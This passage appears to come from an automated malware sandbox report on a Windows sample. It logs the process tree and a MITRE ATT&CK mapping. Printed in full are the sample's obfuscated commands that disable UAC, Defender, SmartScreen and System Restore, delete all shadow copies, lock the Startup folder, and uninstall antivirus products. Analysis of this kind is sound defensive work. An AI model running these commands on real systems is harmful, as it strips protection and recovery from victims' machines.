\"C:\Users\Admin\Desktop\MeasureReceive.txt\" \"C:\Users\Admin\AppData\Local\Temp\2608x592qgmq9o0b8k4.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\ReadHide.jtx\" \"C:\Users\Admin\AppData\Local\Temp\d2i01njhgda6z0ft9.tmp\" -Force"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4208
-
-
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\tmp\.cmd" "2⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\system32\reg.exerEg Add "hKLm\sOftWare\microsOfT\windOws\CurrentVersiOn\polICIEs\sysTem" /v "COnsenTPrompTbEhAvIoradmin" /T rEG_dWOrd /d "0" /F3⤵
- UAC bypass
PID:4680
-
-
C:\Windows\system32\reg.exereg add "hKlm\sOfTwArE\miCrosoFt\WindoWs\currEntVersIon\PoLiCIes\sysTem" /v "COnsEnTPromptbehavIOrUser" /t reG_dWord /d "0" /f3⤵
- UAC bypass
PID:4952
-
-
C:\Windows\system32\reg.exerEg add "hKLm\soFtwArE\micrOsofT\WIndOWs\cUrrenTVersiOn\pOliCIes\system" /V "PromPTOnsECUredesKtoP" /t reG_dWOrd /d "0" /f3⤵
- UAC bypass
PID:2952
-
-
C:\Windows\system32\reg.exereg add "hkLm\soFtwArE\PoliCIes\micrOsoFt\WIndows dEFender\spYneT" /v "sUBmITsAmPlEsConsEnt" /t reg_dWord /d "2" /f3⤵PID:2868
-
-
C:\Windows\system32\reg.exereG Add "hKlm\softwAre\POlicIes\micrOsOfT\Windows dEfEnder\spyneT" /V "sPynetrePOrTIng" /t rEg_dwOrd /d "0" /f3⤵PID:5080
-
-
C:\Windows\system32\reg.exereG Add "hKlm\sOftwArE\pOlIcies\micrOsOFT\WIndOws dEFEndEr" /v "pUAproteCTiOn" /T rEG_dWord /d "0" /F3⤵PID:748
-
-
C:\Windows\system32\reg.exerEg add "hklm\sOfTware\PolIcIEs\micrOsofT\wIndOws dEfendEr\mPenGinE" /v "mpenABlEpUs" /T reg_dWord /d "0" /F3⤵PID:2816
-
-
C:\Windows\system32\reg.exerEG Add "hkLm\sofTwAre\pOLiCIEs\miCrosoFT\WindoWs\sYstEm" /v "EnABLesmArTsCrEen" /t reG_dword /d "0" /F3⤵PID:5012
-
-
C:\Windows\system32\reg.exereG Add "hKlm\sOFTWare\mIcrosoFT\windoWs\cUrrEntVErsiOn\eXPLOrer" /V "smArtscreenEnAblEd" /T reG_sz /d "off" /f3⤵PID:4856
-
-
C:\Windows\system32\reg.exerEG Add "hklm\sOftware\PoLiciEs\microsoFT\mrt" /V "donTofFerthrOuGhWUAU" /T "reG_dwOrd" /d "1" /f3⤵PID:2852
-
-
C:\Windows\system32\reg.exerEG Add "hklm\sOFTWare\polIcies\mICrOsoFt\mrt" /V "dontrEportInfECTIOnInFormAtion" /T "rEg_dWord" /d "1" /f3⤵PID:2180
-
-
C:\Windows\system32\reg.exereG add "hKlm\sOFtWAre\poLICies\mIcrosoft\WindoWs defendEr\uX configuration" /V "notIficatIon_suPPrEss" /t reG_dwOrd /d "1" /f3⤵PID:2212
-
-
C:\Windows\system32\reg.exerEG add "hklm\sOfTWArE\PoliCiEs\miCrosoFT\wIndoWs deFEndEr\WIndows deFender eXplOIT GUArd\ConTrolLed fOLdEr acCess" /v "enablEContrOlledfOLdEracCess" /t reg_dWord /d "0" /F3⤵PID:1572
-
-
C:\Windows\system32\reg.exereG add "hkLm\soFTWare\PoLicies\microsOFT\wIndOws dEfEndEr\rEpOrTInG" /v "dIsAblEEnhAncednOtIFicaTiOns" /T rEG_dword /d "1" /f3⤵PID:5044
-
-
C:\Windows\system32\reg.exereG add "hklm\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions" /V "dIsablEEnhAncEdnOtiFiCatiOns" /t rEg_dWord /d "1" /F3⤵
- Modifies Windows Defender notification settings
PID:4484
-
-
C:\Windows\system32\reg.exereg add "hKLm\softWarE\mIcrosOFt\wIndows dEfender securitY centEr\vIrUs and ThreAT ProtECtIOn" /v "FIlesBLocKednOTIfiCAtiOndIsablEd" /t rEG_dwOrd /d "1" /F3⤵PID:2704
-
-
C:\Windows\system32\reg.exerEG Add "hkLm\sofTware\miCrOsOFt\WIndoWs defEnder seCUriTY centEr\VIrus and threAT proTectiOn" /V "nOaCTIOnnOTIFiCAtIOndIsaBLed" /T rEG_dWord /d "1" /F3⤵PID:1184
-
-
C:\Windows\system32\reg.exereG add "hkLm\softwAre\mIcrosOFT\WindOWs dEfEnder sECUriTy center\virUs And ThrEAt PrOteCTIon" /v "summarynOtIfIcaTIOndIsABled" /t rEG_dwOrd /d "1" /F3⤵PID:2804
-
-
C:\Windows\system32\reg.exereg add "hklm\sOftwAre\PolICiEs\miCrOsofT\wIndows\exPlorEr" /V "dIsABLEnOtIFICaTIoncenTer" /T rEG_dWord /d "1" /F3⤵PID:4904
-
-
C:\Windows\system32\reg.exerEG add "hkCu\sOFtWarE\micrOsOFT\wIndOWs\currenTVersIOn\PUshnOTIfICatIOns" /v "ToastEnablEd" /t rEg_dWord /d "0" /f3⤵PID:4232
-
-
C:\Windows\system32\reg.exereg Add "hKLm\soFtwarE\pOlicIes\micrOsOfT\wIndOWs dEfEnder sEcuritY CEnter\VIrUs And ThrEAT prOTECTion" /v UIlOCKdOWn /T rEG_dWOrd /d 1 /f3⤵PID:3444
-
-
C:\Windows\system32\reg.exerEg add "hKlm\softWArE\POlICiEs\miCrOsofT\wIndOWs dEfEndEr seCUrItY cenTEr\ApP and Browser prOtEction" /V uIloCkdoWn /T rEg_dword /d 1 /f3⤵PID:1156
-
-
C:\Windows\system32\reg.exereG add "hklm\sOFtWarE\POliCiEs\microsofT\wIndows nT\sysTEmrestorE" /V "disAblECOnfIG" /T reG_dword /d "1" /F3⤵PID:5116
-
-
C:\Windows\system32\reg.exerEG add "hKLm\soFtWAre\POLIcIes\mICrOsOFT\wIndows nT\sYsTemresTore" /v "disabLEsr" /T rEg_dword /d "1" /F3⤵PID:4244
-
-
C:\Windows\system32\reg.exerEG add "hKcU\sOFTWare\mIcrosOFT\WIndoWs\CUrrenTvErsIon\poLiCiEs\aTTaChmenTs" /V "sAvezOnEInformATiOn" /T rEg_dwOrd /d "1" /F3⤵PID:4844
-
-
C:\Windows\system32\reg.exereG add "hKLm\sOfTWarE\mICrosOft\windOWs\CurrEnTvErsIon\POLiCIes\AtTachments" /V "sAvEzoneinfOrmATiOn" /T reg_dword /d "1" /f3⤵PID:2432
-
-
C:\Windows\system32\reg.exerEg Add "hKlm\soFTWArE\micrOsoFt\windOws\cUrrenTversiOn\POliciEs\AttachmEnTs" /v "scAnwithantivIrus" /t rEG_dwOrd /d "1" /f3⤵PID:2356
-
-
C:\Windows\system32\icacls.exeicaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /remOve:d "EvErYOnE" /t /C3⤵
- Modifies file permissions
PID:1880
-
-
C:\Windows\system32\icacls.exeiCaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /denY "eVEryOnE":(dE,dC) /t /c3⤵
- Modifies file permissions
PID:4060
-
-
C:\Windows\system32\vssadmin.exevssadmin dELETe shadOws /aLl /QuIEt3⤵
- Interacts with shadow copies
PID:1624
-
-
C:\Windows\system32\attrib.exeaTTrIb +S +H C:\TMP3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4836
-
-
C:\Windows\system32\find.exefind /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3456
-
-
C:\Windows\system32\find.exefind /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2028
-
-
C:\Windows\system32\find.exefind /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3676
-
-
C:\Windows\system32\find.exefind /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:1680
-
-
C:\Windows\system32\find.exefind /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3908
-
-
C:\Windows\system32\find.exefind /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3084
-
-
C:\Windows\system32\find.exefind /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3388
-
-
C:\Windows\system32\find.exefind /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:404
-
-
C:\Windows\system32\find.exefind /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:5112
-
-
C:\Windows\system32\find.exefind /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3816
-
-
C:\Windows\system32\find.exefind /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:832
-
-
C:\Windows\system32\find.exefind /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3628
-
-
C:\Windows\system32\find.exefind /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:4968
-
-
C:\Windows\system32\find.exefind /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3540
-
-
C:\Windows\system32\find.exefind /c /i "unitedstates.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:4116
-
-
C:\Windows\system32\find.exefind /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2364
-
-
C:\Windows\system32\find.exefind /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3316
-
-
C:\Windows\system32\find.exefind /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:4340
-
-
C:\Windows\system32\find.exefind /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2000
-
-
C:\Windows\System32\Wbem\WMIC.exewmic product where name="ESET Security" call uninstall /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3352
-
-
C:\Windows\System32\Wbem\WMIC.exewmic product where name="Emsisoft Anti-Malware" call uninstall /nointeractive3⤵PID:308
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "emsisoft anti-malware" /f3⤵PID:1068
-
-
C:\Windows\system32\cmd.execmd /c "C:\Program Files\Malwarebytes\Anti-Malware\mbuns.exe" /uninstall /verysilent /f3⤵PID:1632
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4356
Network
MITRE ATT&CK Enterprise v15

Privilege Escalation
  - Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  - Create or Modify System Process (1): Windows Service (1)

Defense Evasion
  - Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  - Direct Volume Access (1)
  - File and Directory Permissions Modification (1)
  - Hide Artifacts (2): Hidden Files and Directories (2)
  - Impair Defenses (3): Disable or Modify Tools (3)
  - Indicator Removal (2): File Deletion (2)
  - Modify Registry (3)

Credential Access
  - Credentials from Password Stores (1): Credentials from Web Browsers (1)
  - Unsecured Credentials (1): Credentials In Files (1)
Downloads